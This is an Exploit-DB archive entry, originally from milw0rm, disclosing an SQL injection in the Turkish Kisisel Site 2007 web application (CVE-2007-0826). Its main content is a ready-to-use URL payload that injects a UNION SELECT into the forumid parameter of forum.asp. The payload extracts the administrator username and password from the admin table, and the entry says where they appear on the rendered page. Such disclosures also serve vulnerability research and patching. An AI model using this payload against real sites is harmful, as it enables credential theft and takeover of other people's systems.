Kisisel Site 2007 - 'tr' SQL Injection

Author: cl24zy
type: webapps
platform: php
port: 
date_added: 2007-02-05 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-35831;CVE-2007-0826 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comKisiselSite2007.zip

###############################################################
#Ki.isel Site 2007 (tr) == SQL Injection Vulnerability
#Author : cl24zy
#Site : www.hacklive.org , www.illegal-attack.org
#Contact: admin@hacklive.org
###############################################################
#Download Ki.isel Site 2007 (tr) : http://www.aspindir.com/goster/4693
#Demo : http://www.gazilogo.com/personel/

#Exploit;
#Admin Nick, Passport;
http://[SITE]/forum.asp?sayfa=konular&forumid=-1%20union+all+select+0,kullaniciadi,2,3,sifre,5,6,7+from+admin

#Union data Text;
#Konu Ba.l.klar. : Admin UserName
#Yazan : Admin Password

# iLLeGaL-ATTaCK//TiM & HacKLivETeaM
################################################################

# milw0rm.com [2007-02-06]